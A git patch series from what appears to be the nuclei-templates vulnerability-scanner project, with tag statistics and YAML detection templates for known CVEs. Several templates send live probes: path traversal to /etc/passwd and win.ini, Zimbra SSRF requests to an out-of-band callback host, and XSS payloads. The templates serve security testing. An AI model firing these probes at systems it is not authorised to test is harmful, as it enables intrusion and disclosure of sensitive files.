| | | | +| sourcebans | 1 | | | | | | | | | +| zimbra | 1 | | | | | | | | | +| fiori | 1 | | | | | | | | | +| saltapi | 1 | | | | | | | | | +| tika | 1 | | | | | | | | | +| socomec | 1 | | | | | | | | | +| landray | 1 | | | | | | | | | +| harbor | 1 | | | | | | | | | +| ntopng | 1 | | | | | | | | | +| nexusdb | 1 | | | | | | | | | +| dom | 1 | | | | | | | | | +| hiboss | 1 | | | | | | | | | +| fedora | 1 | | | | | | | | | +| jitsi | 1 | | | | | | | | | +| nomad | 1 | | | | | | | | | +| bruteforce | 1 | | | | | | | | | +| qvisdvr | 1 | | | | | | | | | +| majordomo2 | 1 | | | | | | | | | +| ambari | 1 | | | | | | | | | +| skywalking | 1 | | | | | | | | | +| kyan | 1 | | | | | | | | | +| opentsdb | 1 | | | | | | | | | +| solman | 1 | | | | | | | | | +| tenda | 1 | | | | | | | | | +| maccmsv10 | 1 | | | | | | | | | +| turbocrm | 1 | | | | | | | | | +| zookeeper | 1 | | | | | | | | | +| dnssec | 1 | | | | | | | | | +| domxss | 1 | | | | | | | | | +| phpunit | 1 | | | | | | | | | +| livezilla | 1 | | | | | | | | | +| discourse | 1 | | | | | | | | | +| 74cms | 1 | | | | | | | | | +| magicflow | 1 | | | | | | | | | +| mailchimp | 1 | | | | | | | | | +| dotnet | 1 | | | | | | | | | +| vnc | 1 | | | | | | | | | +| manageengine | 1 | | | | | | | | | +| cors | 1 | | | | | | | | | +| bullwark | 1 | | | | | | | | | +| default | 1 | | | | | | | | | +| getsimple | 1 | | | | | | | | | +| nc2 | 1 | | | | | | | | | +| db | 1 | | | | | | | | | +| portainer | 1 | | | | | | | | | +| enum | 1 | | | | | | | | | +| wuzhicms | 1 | | | | | | | | | +| jfrog | 1 | | | | | | | | | +| sgp | 1 | | | | | | | | | +| spip | 1 | | | | | | | | | +| servicenow | 1 | | | | | | | | | +| fortinet | 1 | | | | | | | | | +| dompdf | 1 | | | | | | | | | +| alertmanager | 1 | | | | | | | | | +| commscope | 1 | | | | | | | | | +| esmtp | 1 | | | | | | | | | +| opm | 1 | | | | | | | | | +| thinkadmin | 1 | | | | | | | | | +| oscommerce | 1 | | | | | | | | | +| ruckus | 1 | | | | | | | | | +| sentry | 1 | | | | | | | | | +| sangfor | 1 | | | | | | | | | +| realteo | 1 | | | | | | | | | +| h3c-imc | 1 | | | | | | | | | +| setup | 1 | | | | | | | | | +| svnserve | 1 | | | | | | | | | +| spectracom | 1 | | | | | | | | | +| node | 1 | | | | | | | | | +| ghost | 1 | | | | | | | | | +| primetek | 1 | | | | | | | | | +| rmi | 1 | | | | | | | | | +| woocomernce | 1 | | | | | | | | | +| opencast | 1 | | | | | | | | | +| wiki | 1 | | | | | | | | | +| bookstack | 1 | | | | | | | | | +| synnefo | 1 | | | | | | | | | +| wamp | 1 | | | | | | | | | +| embedthis | 1 | | | | | | | | | +| duomicms | 1 | | | | | | | | | +| optiLink | 1 | | | | | | | | | +| cloudinary | 1 | | | | | | | | | +| arl | 1 | | | | | | | | | +| zmanda | 1 | | | | | | | | | +| liferay | 1 | | | | | | | | | +| xdcms | 1 | | | | | | | | | +| nedi | 1 | | | | | | | | | +| feifeicms | 1 | | | | | | | | | +| alibaba | 1 | | | | | | | | | +| cve2005 | 1 | | | | | | | | | +| webadmin | 1 | | | | | | | | | +| totaljs | 1 | | | | | | | | | +| myucms | 1 | | | | | | | | | +| drone | 1 | | | | | | | | | +| centreon | 1 | | | | | | | | | +| dotclear | 1 | | | | | | | | | +| postmessage | 1 | | | | | | | | | +| opensns | 1 | | | | | | | | | +| nsasg | 1 | | | | | | | | | +| octobercms | 1 | | | | | | | | | +| upnp | 1 | | | | | | | | | +| circontrol | 1 | | | | | | | | | +| monitorix | 1 | | | | | | | | | +| concrete | 1 | | | | | | | | | +| monitorr | 1 | | | | | | | | | +| csrf | 1 | | | | | | | | | +| pulsesecure | 1 | | | | | | | | | +| cobub | 1 | | | | | | | | | +| zte | 1 | | | | | | | | | +| phpfusion | 1 | | | | | | | | | +| plc | 1 | | | | | | | | | +| centos | 1 | | | | | | | | | +| opensmtpd | 1 | | | | | | | | | +| acexy | 1 | | | | | | | | | +| nordex | 1 | | | | | | | | | +| wavlink | 1 | | | | | | | | | +| servicedesk | 1 | | | | | | | | | +| wing-ftp | 1 | | | | | | | | | +| mobileiron | 1 | | | | | | | | | +| yachtcontrol | 1 | | | | | | | | | +| rsyncd | 1 | | | | | | | | | +| octoprint | 1 | | | | | | | | | +| twitter-server | 1 | | | | | | | | | +| zyxel | 1 | | | | | | | | | +| sprintful | 1 | | | | | | | | | +| mirai | 1 | | | | | | | | | +| faraday | 1 | | | | | | | | | +| favicon | 1 | | | | | | | | | +| moin | 1 | | | | | | | | | +| floc | 1 | | | | | | | | | +| goahead | 1 | | | | | | | | | +| st | 1 | | | | | | | | | +| apiman | 1 | | | | | | | | | +| comodo | 1 | | | | | | | | | +| pippoint | 1 | | | | | | | | | +| 2014 | 1 | | | | | | | | | +| pyramid | 1 | | | | | | | | | +| proftpd | 1 | | | | | | | | | +| moinmoin | 1 | | | | | | | | | +| jnoj | 1 | | | | | | | | | +| firebase | 1 | | | | | | | | | +| emc | 1 | | | | | | | | | +| shopware | 1 | | | | | | | | | +| klog | 1 | | | | | | | | | +| avtech | 1 | | | | | | | | | diff --git a/TOP-10.md b/TOP-10.md index 0f79e9d451..00acf3d125 100644 --- a/TOP-10.md +++ b/TOP-10.md @@ -1,12 +1,12 @@ | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------| -| cve | 511 | dhiyaneshdk | 220 | cves | 518 | info | 535 | http | 1566 | -| panel | 202 | pikpikcu | 195 | vulnerabilities | 246 | high | 426 | file | 42 | -| xss | 182 | pdteam | 187 | exposed-panels | 204 | medium | 349 | network | 35 | -| wordpress | 180 | dwisiswant0 | 126 | exposures | 168 | critical | 201 | dns | 10 | -| exposure | 176 | geeknik | 119 | technologies | 136 | low | 147 | | | -| rce | 173 | daffainfo | 99 | misconfiguration | 115 | | | | | -| cve2020 | 145 | madrobot | 60 | takeovers | 70 | | | | | -| lfi | 143 | princechaddha | 52 | default-logins | 49 | | | | | -| wp-plugin | 120 | gy741 | 48 | file | 42 | | | | | -| config | 90 | gaurang | 42 | workflows | 34 | | | | | +| cve | 547 | dhiyaneshdk | 232 | cves | 554 | info | 569 | http | 1646 | +| panel | 213 | pikpikcu | 225 | vulnerabilities | 252 | high | 441 | file | 44 | +| xss | 202 | pdteam | 189 | exposed-panels | 215 | medium | 371 | network | 35 | +| wordpress | 189 | dwisiswant0 | 126 | exposures | 170 | critical | 210 | dns | 11 | +| rce | 181 | geeknik | 122 | technologies | 156 | low | 150 | | | +| exposure | 180 | daffainfo | 114 | misconfiguration | 119 | | | | | +| lfi | 155 | madrobot | 60 | takeovers | 70 | | | | | +| cve2020 | 153 | gy741 | 54 | default-logins | 49 | | | | | +| wp-plugin | 127 | princechaddha | 53 | file | 44 | | | | | +| tech | 97 | gaurang | 42 | workflows | 34 | | | | | From 4e026979a9d44923a955844141514728e42076e9 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 2 Aug 2021 18:54:22 +0000 Subject: [PATCH 1399/4083] Auto Update README [Mon Aug 2 18:54:22 UTC 2021] :robot: --- README.md | 22 +++++++++++----------- 1 file changed, 11 insertions(+), 11 deletions(-) diff --git a/README.md b/README.md index 2806ca3c1a..d23fdee080 100644 --- a/README.md +++ b/README.md @@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags, | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------| -| cve | 511 | dhiyaneshdk | 220 | cves | 518 | info | 535 | http | 1566 | -| panel | 202 | pikpikcu | 195 | vulnerabilities | 246 | high | 426 | file | 42 | -| xss | 182 | pdteam | 187 | exposed-panels | 204 | medium | 349 | network | 35 | -| wordpress | 180 | dwisiswant0 | 126 | exposures | 168 | critical | 201 | dns | 10 | -| exposure | 176 | geeknik | 119 | technologies | 136 | low | 147 | | | -| rce | 173 | daffainfo | 99 | misconfiguration | 115 | | | | | -| cve2020 | 145 | madrobot | 60 | takeovers | 70 | | | | | -| lfi | 143 | princechaddha | 52 | default-logins | 49 | | | | | -| wp-plugin | 120 | gy741 | 48 | file | 42 | | | | | -| config | 90 | gaurang | 42 | workflows | 34 | | | | | +| cve | 547 | dhiyaneshdk | 232 | cves | 554 | info | 569 | http | 1646 | +| panel | 213 | pikpikcu | 225 | vulnerabilities | 252 | high | 441 | file | 44 | +| xss | 202 | pdteam | 189 | exposed-panels | 215 | medium | 371 | network | 35 | +| wordpress | 189 | dwisiswant0 | 126 | exposures | 170 | critical | 210 | dns | 11 | +| rce | 181 | geeknik | 122 | technologies | 156 | low | 150 | | | +| exposure | 180 | daffainfo | 114 | misconfiguration | 119 | | | | | +| lfi | 155 | madrobot | 60 | takeovers | 70 | | | | | +| cve2020 | 153 | gy741 | 54 | default-logins | 49 | | | | | +| wp-plugin | 127 | princechaddha | 53 | file | 44 | | | | | +| tech | 97 | gaurang | 42 | workflows | 34 | | | | | -**138 directories, 1709 files**. +**139 directories, 1792 files**.

    From 02d3258f2add057a2c204a0515d14c62587185fa Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Tue, 3 Aug 2021 06:19:42 +0700 Subject: [PATCH 1400/4083] Create CVE-2018-20470.yaml --- cves/2018/CVE-2018-20470.yaml | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 cves/2018/CVE-2018-20470.yaml diff --git a/cves/2018/CVE-2018-20470.yaml b/cves/2018/CVE-2018-20470.yaml new file mode 100644 index 0000000000..f330e0e2f4 --- /dev/null +++ b/cves/2018/CVE-2018-20470.yaml @@ -0,0 +1,29 @@ +id: CVE-2018-20470 + +info: + name: Sahi pro 7.x/8.x - Directory Traversal + author: daffainfo + severity: high + description: An issue was discovered in Tyto Sahi Pro through 7.x.x and 8.0.0. A directory traversal (arbitrary file access) vulnerability exists in the web reports module. This allows an outside attacker to view contents of sensitive files. + reference: | + - https://barriersec.com/2019/06/cve-2018-20470-sahi-pro/ + - https://www.cvedetails.com/cve/CVE-2018-20470 + tags: cve,cve2018,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/_s_/dyn/Log_highlight?href=../../../../windows/win.ini&n=1#selected" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "bit app support" + - "fonts" + - "extensions" + condition: and + part: body From 6e13d833eff9e54d0617a6573d370f8db66256e4 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Tue, 3 Aug 2021 06:20:58 +0700 Subject: [PATCH 1401/4083] Create CVE-2018-19458.yaml --- cves/2018/CVE-2018-19458.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 cves/2018/CVE-2018-19458.yaml diff --git a/cves/2018/CVE-2018-19458.yaml b/cves/2018/CVE-2018-19458.yaml new file mode 100644 index 0000000000..19d401e3d7 --- /dev/null +++ b/cves/2018/CVE-2018-19458.yaml @@ -0,0 +1,27 @@ +id: CVE-2018-19458 + +info: + name: PHP Proxy 3.0.3 - Local File Inclusion + author: daffainfo + severity: high + description: In PHP Proxy 3.0.3, any user can read files from the server without authentication due to an index.php?q=file:/// LFI URI, a different vulnerability than CVE-2018-19246. + reference: | + - https://www.exploit-db.com/exploits/45780 + - https://www.cvedetails.com/cve/CVE-2018-19458 + tags: cve,cve2018,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?q=file:///etc/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 From 9c16967fa51a9dfd5c9682bcd874a85b984414b8 Mon Sep 17 00:00:00 2001 From: GwanYeong Kim Date: Tue, 3 Aug 2021 09:31:23 +0900 Subject: [PATCH 1402/4083] Create CVE-2020-7796.yaml Zimbra Collaboration Suite (ZCS) before 8.8.15 Patch 7 allows SSRF when WebEx zimlet is installed and zimlet JSP is enabled. Signed-off-by: GwanYeong Kim --- cves/2020/CVE-2020-7796.yaml | 33 +++++++++++++++++++++++++++++++++ 1 file changed, 33 insertions(+) create mode 100644 cves/2020/CVE-2020-7796.yaml diff --git a/cves/2020/CVE-2020-7796.yaml b/cves/2020/CVE-2020-7796.yaml new file mode 100644 index 0000000000..a07fe20345 --- /dev/null +++ b/cves/2020/CVE-2020-7796.yaml @@ -0,0 +1,33 @@ +id: CVE-2020-7796 + +info: + name: Zimbra Collaboration Suite (ZCS) - Unauthenticated Remote Command Execution + author: gy741 + severity: critical + description: Zimbra Collaboration Suite (ZCS) before 8.8.15 Patch 7 allows SSRF when WebEx zimlet is installed and zimlet JSP is enabled. + reference: | + - https://www.adminxe.com/2183.html + tags: cve,cve2020,zimbra,rce,oob + +requests: + - raw: + - | + GET /zimlet/com_zimbra_webex/httpPost.jsp?companyId=http://{{interactsh-url}}%23 HTTP/1.1 + Host: {{Hostname}} + User-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36 + Accept-Encoding: gzip, deflate + Accept: */* + Connection: keep-alive + + GET /ervice/error/sfdc_preauth.jsp?session=s&userid=1&server=http://{{interactsh-url}}%23.salesforce.com/ HTTP/1.1 + Host: {{Hostname}} + User-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36 + Accept-Encoding: gzip, deflate + Accept: */* + Connection: keep-alive + + matchers: + - type: word + part: interactsh_protocol # Confirms the HTTP Interaction + words: + - "http" From e2a95c2a7846da90e1a7ae53a20c1eedd3a728b0 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Tue, 3 Aug 2021 11:28:37 +0700 Subject: [PATCH 1403/4083] Update jellyfin-detect.yaml --- technologies/jellyfin-detect.yaml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/technologies/jellyfin-detect.yaml b/technologies/jellyfin-detect.yaml index 1bfacb6260..ae031c20ca 100644 --- a/technologies/jellyfin-detect.yaml +++ b/technologies/jellyfin-detect.yaml @@ -12,14 +12,16 @@ requests: - "{{BaseURL}}/web/home.html" - "{{BaseURL}}/index.html" - "{{BaseURL}}/web/index.html" + - "{{BaseURL}}/web/manifest.json" matchers-condition: and matchers: - type: word words: - "name=\"application-name\" content=\"Jellyfin\"" - "class=\"page homePage libraryPage allLibraryPage backdropPage pageWithAbsoluteTabs withTabs\"" + - "The Free Software Media System" condition: or part: body - type: status status: - - 200 \ No newline at end of file + - 200 From 9620f4616ead042558b2e3877aa9ef5444995e22 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 3 Aug 2021 12:42:56 +0530 Subject: [PATCH 1404/4083] Update CVE-2020-7796.yaml --- cves/2020/CVE-2020-7796.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2020/CVE-2020-7796.yaml b/cves/2020/CVE-2020-7796.yaml index a07fe20345..138963c5f4 100644 --- a/cves/2020/CVE-2020-7796.yaml +++ b/cves/2020/CVE-2020-7796.yaml @@ -19,7 +19,7 @@ requests: Accept: */* Connection: keep-alive - GET /ervice/error/sfdc_preauth.jsp?session=s&userid=1&server=http://{{interactsh-url}}%23.salesforce.com/ HTTP/1.1 + GET /service/error/sfdc_preauth.jsp?session=s&userid=1&server=http://{{interactsh-url}}%23.salesforce.com/ HTTP/1.1 Host: {{Hostname}} User-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36 Accept-Encoding: gzip, deflate From b02ea3266b52e80f073482420231cf13588d6942 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 3 Aug 2021 12:47:55 +0530 Subject: [PATCH 1405/4083] Update CVE-2020-7796.yaml --- cves/2020/CVE-2020-7796.yaml | 9 +-------- 1 file changed, 1 insertion(+), 8 deletions(-) diff --git a/cves/2020/CVE-2020-7796.yaml b/cves/2020/CVE-2020-7796.yaml index 138963c5f4..6caf2a6809 100644 --- a/cves/2020/CVE-2020-7796.yaml +++ b/cves/2020/CVE-2020-7796.yaml @@ -1,7 +1,7 @@ id: CVE-2020-7796 info: - name: Zimbra Collaboration Suite (ZCS) - Unauthenticated Remote Command Execution + name: Zimbra Collaboration Suite (ZCS) - SSRF author: gy741 severity: critical description: Zimbra Collaboration Suite (ZCS) before 8.8.15 Patch 7 allows SSRF when WebEx zimlet is installed and zimlet JSP is enabled. @@ -19,13 +19,6 @@ requests: Accept: */* Connection: keep-alive - GET /service/error/sfdc_preauth.jsp?session=s&userid=1&server=http://{{interactsh-url}}%23.salesforce.com/ HTTP/1.1 - Host: {{Hostname}} - User-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36 - Accept-Encoding: gzip, deflate - Accept: */* - Connection: keep-alive - matchers: - type: word part: interactsh_protocol # Confirms the HTTP Interaction From d8007437ae9610ac93f97d9868697174edf0553d Mon Sep 17 00:00:00 2001 From: sandeep Date: Tue, 3 Aug 2021 12:50:10 +0530 Subject: [PATCH 1406/4083] Update CVE-2020-7796.yaml --- cves/2020/CVE-2020-7796.yaml | 1 - 1 file changed, 1 deletion(-) diff --git a/cves/2020/CVE-2020-7796.yaml b/cves/2020/CVE-2020-7796.yaml index 6caf2a6809..772a2a4ce3 100644 --- a/cves/2020/CVE-2020-7796.yaml +++ b/cves/2020/CVE-2020-7796.yaml @@ -17,7 +17,6 @@ requests: User-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36 Accept-Encoding: gzip, deflate Accept: */* - Connection: keep-alive matchers: - type: word From 3c03e28e55e11d9a95836c5a9b6bb472fa89df73 Mon Sep 17 00:00:00 2001 From: sandeep Date: Tue, 3 Aug 2021 12:50:22 +0530 Subject: [PATCH 1407/4083] Update CVE-2020-7796.yaml --- cves/2020/CVE-2020-7796.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2020/CVE-2020-7796.yaml b/cves/2020/CVE-2020-7796.yaml index 772a2a4ce3..6f02ee6688 100644 --- a/cves/2020/CVE-2020-7796.yaml +++ b/cves/2020/CVE-2020-7796.yaml @@ -7,7 +7,7 @@ info: description: Zimbra Collaboration Suite (ZCS) before 8.8.15 Patch 7 allows SSRF when WebEx zimlet is installed and zimlet JSP is enabled. reference: | - https://www.adminxe.com/2183.html - tags: cve,cve2020,zimbra,rce,oob + tags: cve,cve2020,zimbra,ssrf,oob requests: - raw: From ea1ae20a8279dc0776a8497aa5b97b384c3d43fd Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 3 Aug 2021 12:52:56 +0530 Subject: [PATCH 1408/4083] Create zimbra-preauth-ssrf.yaml --- .../other/zimbra-preauth-ssrf.yaml | 25 +++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 vulnerabilities/other/zimbra-preauth-ssrf.yaml diff --git a/vulnerabilities/other/zimbra-preauth-ssrf.yaml b/vulnerabilities/other/zimbra-preauth-ssrf.yaml new file mode 100644 index 0000000000..4b700e84a1 --- /dev/null +++ b/vulnerabilities/other/zimbra-preauth-ssrf.yaml @@ -0,0 +1,25 @@ +id: zimbra-preauth-ssrf + +info: + name: Zimbra Collaboration Suite (ZCS) - SSRF + author: gy741 + severity: critical + reference: | + - https://www.adminxe.com/2183.html + tags: zimbra,ssrf,oob + +requests: + - raw: + - | + GET /service/error/sfdc_preauth.jsp?session=s&userid=1&server=http://{{interactsh-url}}%23.salesforce.com/ HTTP/1.1 + Host: {{Hostname}} + User-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36 + Accept-Encoding: gzip, deflate + Accept: */* + Connection: keep-alive + + matchers: + - type: word + part: interactsh_protocol # Confirms the HTTP Interaction + words: + - "http" From c4acd6230719008f4637a0287ceaccb8fa229a5c Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 3 Aug 2021 13:13:57 +0530 Subject: [PATCH 1409/4083] Update CVE-2018-14013.yaml --- cves/2018/CVE-2018-14013.yaml | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/cves/2018/CVE-2018-14013.yaml b/cves/2018/CVE-2018-14013.yaml index e7c1f61f6e..6c5d601a6f 100644 --- a/cves/2018/CVE-2018-14013.yaml +++ b/cves/2018/CVE-2018-14013.yaml @@ -1,22 +1,23 @@ id: CVE-2018-14013 info: - name: Zimbra XSS. + name: Zimbra XSS author: pikpikcu severity: medium + description: Synacor Zimbra Collaboration Suite Collaboration before 8.8.11 has XSS in the AJAX and html web clients. reference: https://nvd.nist.gov/vuln/detail/CVE-2018-14013 tags: cve,cve2018,xss,zimbra requests: - method: GET path: - - "{{BaseURL}}/zimbra/h/search?si=1&so=0&sfi=4&st=message&csi=1&action=&cso=0&id=%22%22%3E%3Csvg%20onload%3Dalert%28document.domain%29%3E" + - "{{BaseURL}}/zimbra/h/search?si=1&so=0&sfi=4&st=message&csi=1&action=&cso=0&id=%22%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" matchers-condition: and matchers: - type: word words: - - '' + - '' part: body - type: status From 107c3594bff852bdfe156d4d0aa05e4955d45246 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 3 Aug 2021 13:24:31 +0530 Subject: [PATCH 1410/4083] Update CVE-2020-6637.yaml --- cves/2020/CVE-2020-6637.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2020/CVE-2020-6637.yaml b/cves/2020/CVE-2020-6637.yaml index 57877fe639..be10f208a9 100644 --- a/cves/2020/CVE-2020-6637.yaml +++ b/cves/2020/CVE-2020-6637.yaml @@ -11,7 +11,7 @@ info: - https://cinzinga.com/CVE-2020-6637/ requests: - - method: GET + - method: POST path: - '{{BaseURL}}/account/index.php' - '{{BaseURL}}/opensis/index.php' From 63cda4e1efc689d40cfab7bc173330cec063ab81 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Tue, 3 Aug 2021 14:58:19 +0700 Subject: [PATCH 1411/4083] Update CVE-2021-24235.yaml --- cves/2021/CVE-2021-24235.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-24235.yaml b/cves/2021/CVE-2021-24235.yaml index 084545c4e4..4c20a75408 100644 --- a/cves/2021/CVE-2021-24235.yaml +++ b/cves/2021/CVE-2021-24235.yaml @@ -16,7 +16,7 @@ requests: matchers: - type: word words: - - "/Onfocus=alert(123);" + - "input/Autofocus/%0D*/Onfocus=alert(123);" part: body - type: word From 5fb6332bd9da3715349e92155038191cccb9fadc Mon Sep 17 00:00:00 2001 From: GwanYeong Kim Date: Tue, 3 Aug 2021 21:52:14 +0900 Subject: [PATCH 1412/4083] Create longjing-technology-bems-api-lfi.yaml The application suffers from an unauthenticated arbitrary file download vulnerability. Input passed through the fileName parameter through downloads endpoint is not properly verified before being used to download files. This can be exploited to disclose the contents of arbitrary and sensitive files through directory traversal attacks. Signed-off-by: GwanYeong Kim --- .../longjing-technology-bems-api-lfi.yaml | 24 +++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 vulnerabilities/other/longjing-technology-bems-api-lfi.yaml diff --git a/vulnerabilities/other/longjing-technology-bems-api-lfi.yaml b/vulnerabilities/other/longjing-technology-bems-api-lfi.yaml new file mode 100644 index 0000000000..9e8185441c --- /dev/null +++ b/vulnerabilities/other/longjing-technology-bems-api-lfi.yaml @@ -0,0 +1,24 @@ +id: longjing-technology-bems-api-lfi + +info: + name: Longjing Technology BEMS API 1.21 - Remote Arbitrary File Download + author: gy741 + severity: high + description: The application suffers from an unauthenticated arbitrary file download vulnerability. Input passed through the fileName parameter through downloads endpoint is not properly verified before being used to download files. This can be exploited to disclose the contents of arbitrary and sensitive files through directory traversal attacks. + reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5657.php + tags: longjing-technology-bems-api,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/api/downloads?fileName=../../../../../../../../etc/passwd" + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 From b927288f30b5c09a233cef4ed2194b00b0f4843c Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 3 Aug 2021 19:25:06 +0530 Subject: [PATCH 1413/4083] Update CVE-2020-6637.yaml --- cves/2020/CVE-2020-6637.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2020/CVE-2020-6637.yaml b/cves/2020/CVE-2020-6637.yaml index be10f208a9..be79509f04 100644 --- a/cves/2020/CVE-2020-6637.yaml +++ b/cves/2020/CVE-2020-6637.yaml @@ -28,7 +28,7 @@ requests: words: - 'SQL STATEMENT:' - "UPDATE login_authentication SET FAILED_LOGIN=FAILED_LOGIN+1 WHERE UPPER(USERNAME)=UPPER(NULL)or`1`=`1`;-- -')" - + condition: and - type: word part: header words: From a4ad3b2d43c0c0773286e037f38cdc7a7612c36a Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 3 Aug 2021 19:26:06 +0530 Subject: [PATCH 1414/4083] Update opensis-detect.yaml --- technologies/opensis-detect.yaml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/technologies/opensis-detect.yaml b/technologies/opensis-detect.yaml index bf71bbe890..369162c9c1 100644 --- a/technologies/opensis-detect.yaml +++ b/technologies/opensis-detect.yaml @@ -9,12 +9,11 @@ info: requests: - method: GET path: - - "{{BaseURL}}/" + - "{{BaseURL}}" - "{{BaseURL}}/opensis/index.php" matchers-condition: and matchers: - - type: word part: body words: From 28d568b88c89698dda6e440292f67007192d294c Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 3 Aug 2021 19:55:25 +0530 Subject: [PATCH 1415/4083] Update and rename longjing-technology-bems-api-lfi.yaml to bems-api-lfi.yaml --- ...ongjing-technology-bems-api-lfi.yaml => bems-api-lfi.yaml} | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) rename vulnerabilities/other/{longjing-technology-bems-api-lfi.yaml => bems-api-lfi.yaml} (91%) diff --git a/vulnerabilities/other/longjing-technology-bems-api-lfi.yaml b/vulnerabilities/other/bems-api-lfi.yaml similarity index 91% rename from vulnerabilities/other/longjing-technology-bems-api-lfi.yaml rename to vulnerabilities/other/bems-api-lfi.yaml index 9e8185441c..dfde5d648f 100644 --- a/vulnerabilities/other/longjing-technology-bems-api-lfi.yaml +++ b/vulnerabilities/other/bems-api-lfi.yaml @@ -1,4 +1,4 @@ -id: longjing-technology-bems-api-lfi +id: bems-api-lfi info: name: Longjing Technology BEMS API 1.21 - Remote Arbitrary File Download @@ -6,7 +6,7 @@ info: severity: high description: The application suffers from an unauthenticated arbitrary file download vulnerability. Input passed through the fileName parameter through downloads endpoint is not properly verified before being used to download files. This can be exploited to disclose the contents of arbitrary and sensitive files through directory traversal attacks. reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5657.php - tags: longjing-technology-bems-api,lfi + tags: lfi requests: - method: GET From 2e95c0a74ffc634dc45f3ac35960816078594edd Mon Sep 17 00:00:00 2001 From: sandeep Date: Tue, 3 Aug 2021 19:59:39 +0530 Subject: [PATCH 1416/4083] Revert "Auto Generated Templates Stats [Tue Jul 27 00:25:35 UTC 2021] :robot:" This reverts commit 44c0757a23ac9d334927a37008ea44c4cc651a3e. --- TEMPLATES-STATS.json | 2 +- TEMPLATES-STATS.md | 1237 +++++++++++++++++++++--------------------- TOP-10.md | 8 +- 3 files changed, 623 insertions(+), 624 deletions(-) diff --git a/TEMPLATES-STATS.json b/TEMPLATES-STATS.json index 4f260da111..7f012a1194 100644 --- a/TEMPLATES-STATS.json +++ b/TEMPLATES-STATS.json @@ -1 +1 @@ -{"tags":[{"name":"cve","count":512},{"name":"panel","count":202},{"name":"xss","count":182},{"name":"wordpress","count":180},{"name":"exposure","count":176},{"name":"rce","count":174},{"name":"cve2020","count":145},{"name":"lfi","count":143},{"name":"wp-plugin","count":120},{"name":"config","count":90},{"name":"cve2021","count":84},{"name":"cve2019","count":82},{"name":"tech","count":78},{"name":"takeover","count":72},{"name":"","count":66},{"name":"cve2018","count":66},{"name":"token","count":63},{"name":"apache","count":61},{"name":"default-login","count":50},{"name":"iot","count":43},{"name":"cve2017","count":43},{"name":"file","count":42},{"name":"unauth","count":40},{"name":"network","count":35},{"name":"sqli","count":34},{"name":"oob","count":33},{"name":"oracle","count":29},{"name":"workflow","count":29},{"name":"logs","count":29},{"name":"misc","count":27},{"name":"ssrf","count":27},{"name":"atlassian","count":26},{"name":"jira","count":26},{"name":"disclosure","count":25},{"name":"cve2016","count":23},{"name":"listing","count":22},{"name":"redirect","count":20},{"name":"aem","count":19},{"name":"cisco","count":17},{"name":"sap","count":16},{"name":"debug","count":14},{"name":"cve2015","count":13},{"name":"fuzz","count":13},{"name":"struts","count":13},{"name":"misconfig","count":13},{"name":"auth-b